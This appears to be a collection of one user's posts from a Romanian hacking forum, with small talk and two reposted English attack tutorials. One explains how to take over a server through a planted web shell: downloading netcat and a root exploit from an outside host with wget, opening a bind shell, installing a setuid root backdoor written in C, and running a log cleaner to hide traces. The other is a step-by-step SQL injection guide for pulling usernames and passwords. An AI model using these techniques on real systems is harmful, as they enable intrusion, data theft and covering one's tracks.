paxnWo

thanks o sa incep sa postez site-uri vulnerabile rfi . va dau lista , voi va jucati

thanks a lot <'>

bha ce dracu faceti atat offtopic ? post hunterii dracu

1. Most complete SQL injection paper http://pastebin.com/f5e40a4c9 2. Blind Injections SQL Revised http://pastebin.com/f67db979

happy bday app , maine e ziua mea xD

cand imi iau laptop ii pun gOS pe el

iti place bt3 , dar la ce te ajuta ? in ce scopuri il folosesti ? eu sunt slack user . nu am folosit niciodata la linux GUI . doar CLI . iar nu am folosit niciodata linux pt multimedia sau alte porcarii . in general l-am folosit pt webservere si emulatoare .

welcome use search and help . don't spam and don't offtopic

http://www.softpedia.com/get/Internet/Other-Internet-Related/RST-IP-Locator.shtml

Inregistrez tutoriale video cu dedicatie pentru fanii mei lasati aici un request . excudem : deface .

exploitul este pt redhat 6.2 si se executa din shell . touch exploit.run | most copiezi exploitul si ii dai save . exploit.run

nope . ......

da have fun pwning

e un scanner scris in python . uite aici cum sa il folosesti . http://www.rstcenter.com/forum/showthread.php?t=12970&highlight=python

Required for this tutorial: Access to a shell - Upload by any-means a shell onto a box mig-log cleaner - [URL]http://b14ck1c3.freehostia.com/miglc[/URL] Netcat - [URL]http://www.vulnwatch.org/netcat/nc111nt.zip[/URL] Netcat(unix) - [URL]http://b14ck1c3.freehostia.com/nc[/URL] Local Root Exploit - [URL]http://jshooter.by.ru/xpl/[/URL] half a brain willingness to learn Now that you have all that in order lets begin. Go to the path of or access your shell by whatever means nessecary. Make sure that your shell is in a writable folder just to make things easy for us. In our case today for this tutorial we will be using storm7shell not exactly my favorite but will get the job done none the less. An example of this location would be something like: [URL]http://target/youshell.php[/URL] Now that we are on your shells page we want to find out what os this box is running and what version the kernel is. In our case it's linux 2.6.8. So we will want to find a local root exploit for this kernel version of the linux os. What we want to do now that we have our local root exploit for our kernel is spawn a shell so that we can talk to the victim's box and run our commands without interuption, But how are we suppose to do that? This can be done by using a tool called Netcat. So now that we have a copy of Netcat we will go to the shell, Find the command execution area of the shell and enter: wget [URL]http://b14ck1c3.freehostia.com/nc[/URL] What this will do is download the file of Netcat i have pre-compiled and hosted for you onto the victim box to the location of your shell. Once we have the download complete we will want to chmod it so that our user has access to run it. which can be done by entering: chmod +x nc What this does is grants everyone (user, group and other) execute permission, and the command to the file nc which we had just previously downloaded onto the box with the wget command. Now that we have nc installed on both the victim machine and your own it's time to make our connection. How Do we make a connection with nc? In the command execution area of your shell enter: ./nc -l -p 8080 -e /bin/sh (shell can be /bin/sh or cmd.exe for example) And then on the netcat installed on your pc you will want to enter: nc VictimIP Port *in our case 8080* eg 123.123.123.123 8080 What this will do is cause the netcat on the victims box to listen on port 8080 and shovel back an interactive shell for you once you make the connection from which you typed: nc victimip port Now that We have our interactive shell spawned we can start to prepare the box for rooting. First we will want to get our local root exploit onto the box and get it compiled if it's not already. This can be done by once again using that nifty wget command we learned about in the previous steps. wget [URL]http://yoursite/xpl[/URL] What we have done is now downloaded your exploit. If your exploit is not already compiled you will need to compile it in order to run it. Compiling your exploit can be done by using the gcc, like so: gcc xpl.c -o xpl;chmod +x xpl This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on. The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using. You can run your xpl file by entering in: ./xpl Wait until your exploit is finished running once it is done enter: whoami What the whoami command does is tells you who you are if this tells you root then you xpl has done it's job and you now have root priv's on the box. or you can type: id which will give you something like: uid=0(root) gid=0(root) groups=500(apache) or something similar And now you can do your happy dance. Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make sure that we can come and go as we please without all the hassel of rooting the box over and over. So we will want to create some kind of backdoor. we can make this happen with few lines of code: #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main( void ) { setuid( 0 ); system( "/bin/bash" ); return 0; } Compile it and change permissions: root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdr Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably in the $PATH) and if you execute it as another user: raif@foobar /home/raif$ /usr/local/bin/.bkdr root@foobar /home/raif# whoami root Now you have your access back. Alright we are almost completed our mission we have successfully rooted our victims box created our backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you can get here: [URL]http://b14ck1c3.freehostia.com/miglc[/URL] Once again we can use our wget command to upload our logcleaner to the rooted box. wget [URL]http://b14ck1c3.freehostia.com/miglc;chmod[/URL] +x miglc now just run the logcleaner ./miglc The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner so you may choose how exactly you want to clean the logs with the commands given to you. Credits : w3tw0rk

depinde ce distributie de linux. nu se aplica acelasi exploit pt toate. exploits : http://www.irongeek.com/i.php?page=videos/metasploit1 http://www.milw0rm.com/platforms/linux see this tutorial : http://www.rstcenter.com/forum/showthread.php?p=81478#post81478

md5 e unidirectional, nu poti sa ii dai decrypt . poti sa il crackuiesti . mai incearca milw0rm sau john the ripper ( see this : http://www.osix.net/modules/article/?id=455 )

rootshell . adica ai privilegii de admin .

always , anytime , anyhow

o total inutil threadul asta nu o sa va ajute cu nimic . nu se aplica doar pentru romani, sunt chestii generice . uitati aici wordlist . are cateva milioane de cuvinte nu l-am sortat, doar nu sunt nebun ia 10 zile wordlist.txt - 37.2 Mb

bha esti nebun ? intra pe chat http://www.rstcenter.com/chat/ poate iti gasesc eu . ti-am gasit . dami un mail pe paxnwo@yahoo.com si iti trimit detaliile contului .

hex a fost vip mi se pare oricum , threadul asta a fost deschis pt admini , nu pentru noi nu pot sa imi dau cu parerea ca nu il cunosc

cum retin eu parolele un pic mai lungi 112358131m2s3r4g^^^ 112358131 - nr lui fibonacci 1m2s3r4g - 1 for the money , 2 for the show , 3 to get ready and 4 to go ^^^ - 666

I will try to present the method I'm using when doing SQL Injections. This tutorial/guide will be wrapped around PHP + MySQL (MyISAM, Default engine as of MySQL 3.23). I assume you have PHP and MySQL basic knowlegde. How can i find out if a site is vulnerable to SQL injection ? Let's suppose that you are surfing a site and you notice that the link looks like this: http://site.com/view.php?id=1234 You try to see if it vulnerable by adding a character such as ' or " and the URL will look similar to: http://site.com/view.php?id=1234' or http://site.com/view.php?id=1234" If it gives an error such as: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1234''' at line 1 Very nice. We have some vulnerable code to play with. Let's try to visualize how the programmer wrote the vulnerable PHP code. $query = "SELECT * FROM products WHERE id='". $_GET['id'] ."'"; mysql_query($query); echo mysql_error(); We can clearly see that he did not try to sanitize any of the variables. To further test if you can create a valid MySQL query you could try to insert ' or 1='1, thus creating the link: http://site.com/view.php?id=' or 1='1 If it will not give you an error it means that you can probably can insert whatever your heart desires. Let's make a small analysis of the SQL queries just created. If you insert 1234' the query looks like this: SELECT * FROM products WHERE id='1234'' - it is obviously wrong If you insert ' or 1='1 you get: SELECT * FROM products WHERE id='' or 1='1' - this is a valid SQL statement that will retrieve the first item in the table Ok, at this point we know we can SQL Inject the victim. What's next ? Preparing for the attack We need to find how many columns the table products has This is pretty easy. I strongly recommend using HackBar at least from now on. This is done with adding ' ORDER BY [number]. You start from 1 and end when you get a MySQL error. Then you will know that the previous number was the limit of the columns that are retrieved in the query. It goes like this: http://site.com/view.php?id=1234' ORDER BY 1 /* http://site.com/view.php?id=1234' ORDER BY 2 /* ... http://site.com/view.php?id=1234' ORDER BY 7 /* http://site.com/view.php?id=1234' ORDER BY 8 /* <- here we get the MySQL error we were searching for. This means that the select retrieves 7 columns. What next? Doing a basic attack First we need to create the basic string that will help us getting the information we want from the database. http://site.com/view.php?id=12349999' UNION ALL SELECT 1,2,3,4,5,6,7 FROM [tablename] /* This is it. Why did i insert 12349999 ? Because we don't want anything else to be selected from the table, we only want the information that helps us. So i inserted an id that i am sure it does not exist. And we start searching for table names until we don't get a MySQL error. You could try table names like: user, users, members, admin, member, ... But what can i do if i cannot guess a valid table name ? This brings us to the next step. When you execute this query you need to find in the page some of the numbers For example if you see the numbers 2 and 4 in the page you know that the second and the fourth columns are echoed. We will use these columns to retrieve the data we want in the next steps. Extracting the database structure through SQL Injection MySQL has a database named: information_schema This database has all the information we want. For example it has a table named: TABLES If you install MySQL engine and you look at this table you can clearly see what it has stored. You can fetch the table names from there. Let's see how such query looks like http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables/* The problem here is that we do not retrieve exactly the data we want. We need to change some things. We need the database name that we want to attack. This can be retrieved with: http://site.com/view.php?id=12349999' union all select 1,2,3,4,5,6,7 from TableThatDoesNotExist/* It will output an error that discloses the database name: 1146: Table 'DataBaseName.TableThatDoesNotExist' doesn't exist Using this information we can create this query: http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' /* Here we have another problem, we can see only 1 tablename and it's assigned number of rows inserted. We need to surf through all the tables of this database. http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 1,1/* this gives us the first tablename http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 2,1/* the second tablename http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 3,1/* the third, and so on, until we get all the table names. I suggest you note the information retrieved because you will need this for further digging. Ok, so we have all the table names now. What do we need to do next ? The column names. This is very similar, because this information is also stored in information_schema database. http://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 1,1/* the first column name of table members http://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 2,1/* the second one, and so on... At this point we have the table names with their column names also. I think we have all we need now. Chanting the magic words As i said we have the table names and the column names. Let's create the query that will read a username and password from table members http://site.com/view.php?id=12349999' union all select 1,user,3,password,5,6,7 from members where LIMIT 1,1/* That was it folks. Log in with admin password, or create a script that will extract any data you want from their database. Your choice. by zbeng

A facut careva cursuri MCSA ?